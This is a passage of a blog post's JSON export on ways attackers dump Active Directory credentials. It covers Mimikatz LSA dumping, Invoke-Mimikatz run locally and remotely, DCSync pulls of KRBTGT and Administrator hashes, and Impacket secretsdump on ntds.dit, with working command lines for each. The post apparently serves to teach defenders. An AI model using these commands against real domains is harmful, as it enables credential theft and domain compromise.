Tickets.<\/p>\n<p><em>NOTE:<br \/>\nThere are many different tools that can dump AD credentials when run locally on the DC, I tend to focus on Mimikatz since it has extensive credential theft and injection capability (and more) enabling credential dumping from a wide variety of sources and scenarios.<\/em><\/p>\n<p>Command:\u00a0 mimikatz lsadump::lsa \/inject exit<\/p>\n<p>Dumps credential data in an Active Directory domain when run on a Domain Controller.<br \/>\nRequires administrator access with debug or Local SYSTEM rights<\/p>\n<p>Note: The account with RID 502 is the KRBTGT account and the account with RID 500 is the default administrator for the domain.<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2015\/09\/Mimikatz-LSADump-LSA.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1823\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2015\/09\/Mimikatz-LSADump-LSA.png\" sizes=\"auto, (max-width: 413px) 100vw, 413px\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2015\/09\/Mimikatz-LSADump-LSA-208x300.png 208w, https:\/\/adsecurity.org\/wp-content\/uploads\/2015\/09\/Mimikatz-LSADump-LSA.png 413w\" alt=\"Mimikatz-LSADump-LSA\" width=\"413\" height=\"595\" \/><\/a><br \/>\n<a id=\"InvokeMimikatzLocal\"><\/a><\/p>\n<h4><strong>Dumping Active Directory credentials locally using Invoke-Mimikatz (on the DC).<\/strong><\/h4>\n<p><a href=\"https:\/\/github.com\/PowerShellMafia\/PowerSploit\/blob\/master\/Exfiltration\/Invoke-Mimikatz.ps1\">Invoke-Mimikatz<\/a> is a component of <a href=\"https:\/\/github.com\/PowerShellMafia\/PowerSploit\">PowerSploit <\/a>written by Joe Bialek (<a href=\"https:\/\/twitter.com\/JosephBialek\">@JosephBialek<\/a>) which incorporates all the functionality of Mimikatz in a Powershell function. It \u201cleverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as dump credentials without ever writing the Mimikatz binary to disk.\u201d Note that the PowerSploit framework is now hosted in the <a href=\"https:\/\/github.com\/PowerShellMafia\/PowerSploit\">\u201cPowerShellMafia\u201d GitHub repository<\/a>.<\/p>\n<p>What gives Invoke-Mimikatz its \u201cmagic\u201d is the ability to reflectively load the Mimikatz DLL (embedded in the script) into memory. The Invoke-Mimikatz code can be downloaded from the Internet (or intranet server), and executed from memory without anything touching disk. Furthermore, if Invoke-Mimikatz is run with the appropriate rights and the target computer has PowerShell Remoting enabled, it can pull credentials from other systems, as well as execute the standard Mimikatz commands remotely, without files being dropped on the remote system.<\/p>\n<p>Invoke-Mimikatz is not updated when Mimikatz is, though it can be (manually). One can swap out the DLL encoded elements (32bit &amp; 64bit versions) with newer ones.<\/p>\n<ul>\n<li>Use mimikatz to dump credentials out of LSASS:\u00a0 <em>Invoke-Mimikatz -DumpCreds<\/em><\/li>\n<li>Use mimikatz to export all private certificates (even if they are marked non-exportable): <em>Invoke-Mimikatz \u2013<\/em>DumpCerts<\/li>\n<li>Elevate privilege to have debug rights on remote computer: <em>Invoke-Mimikatz -Command \u201cprivilege::debug exit\u201d -ComputerName \u201ccomputer1\u201d<\/em><\/li>\n<\/ul>\n<p>The Invoke-Mimikatz \u201cCommand\u201d parameter enables Invoke-Mimikatz to run custom Mimikatz commands.<br \/>\n<strong><em>Defenders should expect that any functionality included in Mimikatz is available in Invoke-Mimikatz.<\/em><\/strong><\/p>\n<p>Command:<br \/>\n<em>Invoke-Mimikatz -Command &#8216;&#8221;privilege::debug&#8221; &#8220;LSADump::LSA \/inject&#8221; exit&#8217;<\/em><\/p>\n<p>Dumps credential data in an Active Directory domain when run on a Domain Controller.<br \/>\nRequires administrator access with debug or Local SYSTEM rights<\/p>\n<p>Note: The account with RID 502 is the KRBTGT account and the account with RID 500 is the default administrator for the domain.<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/InvokeMimikatz-RunFromInternet-LSADumpLSA-Inject-Local.jpg\" rel=\"attachment wp-att-2415\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2415\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/InvokeMimikatz-RunFromInternet-LSADumpLSA-Inject-Local.jpg\" alt=\"InvokeMimikatz-RunFromInternet-LSADumpLSA-Inject-Local\" width=\"1206\" height=\"1694\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/InvokeMimikatz-RunFromInternet-LSADumpLSA-Inject-Local.jpg 1206w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/InvokeMimikatz-RunFromInternet-LSADumpLSA-Inject-Local-214x300.jpg 214w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/InvokeMimikatz-RunFromInternet-LSADumpLSA-Inject-Local-768x1079.jpg 768w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/InvokeMimikatz-RunFromInternet-LSADumpLSA-Inject-Local-729x1024.jpg 729w\" sizes=\"auto, (max-width: 1206px) 100vw, 1206px\" \/><\/a><br \/>\n<a id=\"InvokeMimikatzRemote\"><\/a><\/p>\n<h4><strong>Dumping Active Directory credentials remotely using Invoke-Mimikatz (via PowerShell Remoting).<\/strong><\/h4>\n<p><a href=\"https:\/\/github.com\/PowerShellMafia\/PowerSploit\/blob\/master\/Exfiltration\/Invoke-Mimikatz.ps1\">Invoke-Mimikatz<\/a> is a component of <a href=\"https:\/\/github.com\/PowerShellMafia\/PowerSploit\">PowerSploit <\/a>written by Joe Bialek (<a href=\"https:\/\/twitter.com\/JosephBialek\">@JosephBialek<\/a>) which incorporates all the functionality of Mimikatz in a Powershell function. It \u201cleverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as dump credentials without ever writing the Mimikatz binary to disk.\u201d Note that the PowerSploit framework is now hosted in the <a href=\"https:\/\/github.com\/PowerShellMafia\/PowerSploit\">\u201cPowerShellMafia\u201d GitHub repository<\/a>.<\/p>\n<p>Command:<br \/>\n<em>Invoke-Mimikatz -Command &#8216;&#8221;privilege::debug&#8221; &#8220;LSADump:LSA \/inject&#8221;&#8216; -Computer RDLABDC02.rd.adsecurity.org<\/em><\/p>\n<p>This example executes Invoke-Mimikatz from code downloaded from the Internet and executed entirely in memory. If the attacker compromised a workstation a Domain Admin logged onto, this scenario would work, enabling the attacker to grab AD credentials and upload to the Internet.<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/InvokeMimikatz-RunFromInternet-LSADumpLSA-Inject-Computer-RDLABDC02.jpg\" rel=\"attachment wp-att-2413\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2413\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/InvokeMimikatz-RunFromInternet-LSADumpLSA-Inject-Computer-RDLABDC02.jpg\" alt=\"InvokeMimikatz-RunFromInternet-LSADumpLSA-Inject-Computer-RDLABDC02\" width=\"1199\" height=\"1683\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/InvokeMimikatz-RunFromInternet-LSADumpLSA-Inject-Computer-RDLABDC02.jpg 1199w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/InvokeMimikatz-RunFromInternet-LSADumpLSA-Inject-Computer-RDLABDC02-214x300.jpg 214w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/InvokeMimikatz-RunFromInternet-LSADumpLSA-Inject-Computer-RDLABDC02-768x1078.jpg 768w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/InvokeMimikatz-RunFromInternet-LSADumpLSA-Inject-Computer-RDLABDC02-730x1024.jpg 730w\" sizes=\"auto, (max-width: 1199px) 100vw, 1199px\" \/><\/a><br \/>\n<a id=\"MimikatzDCSync\"><\/a><\/p>\n<h4><strong>Dumping Active Directory credentials remotely using <a href=\"https:\/\/adsecurity.org\/?page_id=1821\">Mimikatz<\/a>&#8216;s DCSync.<\/strong><\/h4>\n<p>A major feature added to <a href=\"https:\/\/adsecurity.org\/?page_id=1821\">Mimikatz<\/a> in August 2015 is \u201cDCSync\u201d which effectively \u201cimpersonates\u201d a Domain Controller and requests account password data from the targeted Domain Controller. DCSync was written by Benjamin Delpy and Vincent Le Toux.<\/p>\n<p>The exploit method prior to DCSync was to run Mimikatz or Invoke-Mimikatz on a Domain Controller to get the KRBTGT password hash to create Golden Tickets. With Mimikatz\u2019s DCSync and the appropriate rights, the attacker can pull the password hash, as well as previous password hashes, from a Domain Controller over the network without requiring interactive logon or copying off the Active Directory database file (ntds.dit).<\/p>\n<p>Special rights are required to run DCSync. Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data. Note that Read-Only Domain Controllers are not only allowed to pull password data for users by default.<\/p>\n<p><b>How DCSync works:<\/b><\/p>\n<ol>\n<li>Discovers Domain Controller in the specified domain name.<\/li>\n<li>Requests the Domain Controller replicate the user credentials via <a href=\"https:\/\/msdn.microsoft.com\/en-us\/library\/dd207691.aspx\">GetNCChanges <\/a>(leveraging <a href=\"https:\/\/msdn.microsoft.com\/en-us\/library\/cc228086.aspx\">Directory Replication Service (DRS) Remote Protocol<\/a>)<\/li>\n<\/ol>\n<p>I have previously done some packet captures for <a href=\"http:\/\/blogs.metcorpconsulting.com\/tech\/?p=923\">Domain Controller replication<\/a> and identified the intra-DC communication flow regarding how Domain Controllers replicate.<\/p>\n<p>The Samba Wiki describes the <a href=\"https:\/\/wiki.samba.org\/index.php\/DRSUAPI\">DSGetNCChanges function<\/a>:<\/p>\n<p><i>\u201cThe client DC sends a DSGetNCChanges request to the server when the first one wants to get AD objects updates from the second one. The response contains a set of updates that the client has to apply to its NC replica. &#8230;<br \/>\nWhen a DC receives a DSReplicaSync Request, then for each DC that it replicates from (stored in RepsFrom data structure) it performs a replication\u00a0cycle where it behaves like a client and makes DSGetNCChanges requests to that DC. So it gets up-to-date AD objects from each of the DC\u2019s which it replicates from.\u201d<\/i><\/p>\n<p><strong><a href=\"https:\/\/adsecurity.org\/?page_id=1821#DCSync\">DCSync Options<\/a>:<\/strong><\/p>\n<ul>\n<li>\/user \u2013 user id or SID of the user you want to pull the data for.<\/li>\n<li>\/domain\u00a0(optional) \u2013 FQDN of the Active Directory domain. Mimikatz will discover a DC in the domain to connect to. If this parameter is not provided, Mimikatz defaults to the current domain.<\/li>\n<li>\/dc (optional) \u2013 Specify the Domain Controller you want DCSync to connect to and gather data.<\/li>\n<\/ul>\n<p>There\u2019s also a \/guid parameter.<\/p>\n<p><strong>DCSync Command Examples:<\/strong><\/p>\n<p>Pull password data for the KRBTGT user account in the rd.adsecurity.org domain:<br \/>\n<em>Mimikatz \u201cprivilege::debug\u201d \u201clsadump::dcsync \/domain:rd.adsecurity.org \/user:krbtgt\u201d exit<\/em><\/p>\n<p>Pull password data for the Administrator user account in the rd.adsecurity.org domain:<br \/>\n<em>Mimikatz \u201cprivilege::debug\u201d \u201clsadump::dcsync \/domain:rd.adsecurity.org \/user:Administrator\u201d exit<\/em><\/p>\n<p>Pull password data for the ADSDC03 Domain Controller computer account in the lab.adsecurity.org domain:<br \/>\n<em>Mimikatz \u201cprivilege::debug\u201d \u201clsadump::dcsync \/domain:lab.adsecurity.org \/user:adsdc03$\u201d exit<\/em><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2100\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2015\/11\/FGPP-DCSync-Standard-NoClearTextPassword.jpg\" sizes=\"auto, (max-width: 777px) 100vw, 777px\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2015\/11\/FGPP-DCSync-Standard-NoClearTextPassword-238x300.jpg 238w, https:\/\/adsecurity.org\/wp-content\/uploads\/2015\/11\/FGPP-DCSync-Standard-NoClearTextPassword-813x1024.jpg 813w, https:\/\/adsecurity.org\/wp-content\/uploads\/2015\/11\/FGPP-DCSync-Standard-NoClearTextPassword.jpg 1180w\" alt=\"FGPP-DCSync-Standard-NoClearTextPassword\" width=\"777\" height=\"978\" \/><\/p>\n<p>If the <a href=\"https:\/\/adsecurity.org\/?p=2053\">account is enabled for &#8220;reversible encryption&#8221;<\/a>, the clear-text password shown.<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2103\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2015\/11\/FGPP-DCSync-ClearTexPassword-2.jpg\" sizes=\"auto, (max-width: 761px) 100vw, 761px\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2015\/11\/FGPP-DCSync-ClearTexPassword-2-732x1024.jpg 732w, https:\/\/adsecurity.org\/wp-content\/uploads\/2015\/11\/FGPP-DCSync-ClearTexPassword-2.jpg 1181w\" alt=\"FGPP-DCSync-ClearTexPassword-2\" width=\"761\" height=\"1064\" \/><\/p>\n<h4>Extract Hashes from NTDS.dit<\/h4>\n<p>One method to extract the password hashes from the NTDS.dit file is Impacket&#8217;s secretsdump.py (Kali, etc).<br \/>\nJust need the ntds.dit file and the System hive from the DC&#8217;s registry (you have both of these with an Install from Media (IFM) set from ntdsutil).<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/IMPacket-Dump-Credentials-NTDSdit.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2872\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/IMPacket-Dump-Credentials-NTDSdit.png\" alt=\"IMPacket-Dump-Credentials-NTDSdit\" width=\"1011\" height=\"746\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/IMPacket-Dump-Credentials-NTDSdit.png 1011w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/IMPacket-Dump-Credentials-NTDSdit-300x221.png 300w, https:\/\/adsecurity.org\/wp-content\/uploads\/2016\/01\/IMPacket-Dump-Credentials-NTDSdit-768x567.png 768w\" sizes=\"auto, (max-width: 1011px) 100vw, 1011px\" \/><\/a><\/p>\n<h4><\/h4>\n<h4><span style=\"text-decoration: underline;\">References:<\/span><\/h4>\n<ul>\n<li><a href=\"https:\/\/adsecurity.org\/?page_id=1352\">Sean Metcalf\u2019s Presentations on Active Directory Security<\/a><\/li>\n<li><a href=\"https:\/\/adsecurity.org\/?p=451\">How Attackers Pull the Active Directory Database (NTDS.dit) from a Domain Controller<\/a><\/li>\n<li><a href=\"https:\/\/adsecurity.org\/?p=2362\">Attack Methods for Gaining Domain Admin Rights in Active Directory<\/a><\/li>\n<li><a href=\"https:\/\/adsecurity.org\/?p=1729\">Mimikatz DCSync Usage, Exploitation, and Detection <\/a><\/li>\n<li><a href=\"https:\/\/adsecurity.org\/?p=2053\">Dump Clear-Text Passwords for All Admins in the Domain Using Mimikatz DCSync <\/a><\/li>\n<li><a href=\"https:\/\/adsecurity.org\/?page_id=1821\">Mimikatz Guide and Command Reference<\/a><\/li>\n<li>Matt Graeber presented on leveraging WMI for offensive purposes at Black Hat USA 2015 (<a href=\"https:\/\/www.blackhat.com\/docs\/us-15\/materials\/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf\">paper<\/a>, <a href=\"https:\/\/www.blackhat.com\/docs\/us-15\/materials\/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor.pdf\">slides<\/a>, and <a href=\"https:\/\/www.youtube.com\/watch?v=pqth74Uzxy4\">video<\/a>). Matt also spoke at DEF CON 23 (<a href=\"https:\/\/www.youtube.com\/watch?v=xBd6p-Lz3kE\">video<\/a>) with colleagues and dove further into offensive WMI capability (and again at DerbyCon &#8211; <a href=\"https:\/\/www.youtube.com\/watch?v=3UZ3Afm5hO4\">video<\/a>)<\/li>\n<li><a href=\"https:\/\/github.com\/PowerShellMafia\/PowerSploit\">PowerShellMafia&#8217;s PowerSploit offensive PowerShell tools on Github<\/a><\/li>\n<li>Joe Bialek&#8217;s (<a href=\"https:\/\/twitter.com\/JosephBialek\">@JosephBialek<\/a>) <a href=\"https:\/\/clymb3r.wordpress.com\/2013\/06\/13\/using-powershell-to-copy-ntds-dit-registry-hives-bypass-sacls-dacls-file-locks\/\">his blog post about Invoke-NinjaCopy<\/a><\/li>\n<li><a href=\"https:\/\/github.com\/yosqueoy\/ditsnap\">DIT Snapshot Viewer<\/a><\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>I previously posted some information on dumping AD database credentials before in a couple of posts: &#8220;How Attackers Pull the Active Directory Database (NTDS.dit) from a Domain Controller&#8221; and &#8220;Attack Methods for Gaining Domain Admin Rights in Active Directory&#8220;. This post covers many different ways that an attacker can dump credentials from Active Directory, both &hellip; <\/p>\n<p><a class=\"more-link btn\" href=\"https:\/\/adsecurity.org\/?p=2398\">Continue reading<\/a><\/p>\n","protected":false},"author":2,"featured_media":2413,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[565,11,2],"tags":[784,785,777,786,794,795,598,773,796,772,797,771,787,792,336,770,249,394,774,775,207,599,691,793,316,477,232,776,780,779,781,546,778,782,783],"class_list":["post-2398","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-activedirectorysecurity","category-microsoft-security","category-technical-reference","tag-784","tag-785","tag-activedirectorydatabase","tag-administrator","tag-copy-ntds-dit","tag-copyntds-dit","tag-dcsync","tag-ditsnapshotviewer","tag-dumpactivedirectory","tag-dumpadcredentials","tag-dumpadcreds","tag-dumpcredentials","tag-dumpcreds","tag-esentutl","tag-invoke-mimikatz","tag-invoke-ninjacopy","tag-invoke-reflectivepeinjection","tag-krbtgt","tag-lsadumpdcsync","tag-lsadumplsa","tag-mimikatz","tag-mimikatzdcsync","tag-ntds-dit","tag-ntdsutil","tag-passtheticket","tag-powershellremoting","tag-powersploit","tag-sekurlsalogonpasswords","tag-volumeshadowcopy","tag-vss","tag-vssntds-dit","tag-wmi","tag-wmic","tag-wmicpasstheticket","tag-wmiptt","item-wrap"],"_links":{"self":[{"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/posts\/2398","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/adsecurity.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2398"}],"version-history":[{"count":38,"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/posts\/2398\/revisions"}],"predecessor-version":[{"id":2874,"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/posts\/2398\/revisions\/2874"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/media\/2413"}],"wp:attachment":[{"href":"https:\/\/adsecurity.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2398"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/adsecurity.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2398"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/adsecurity.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2398"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}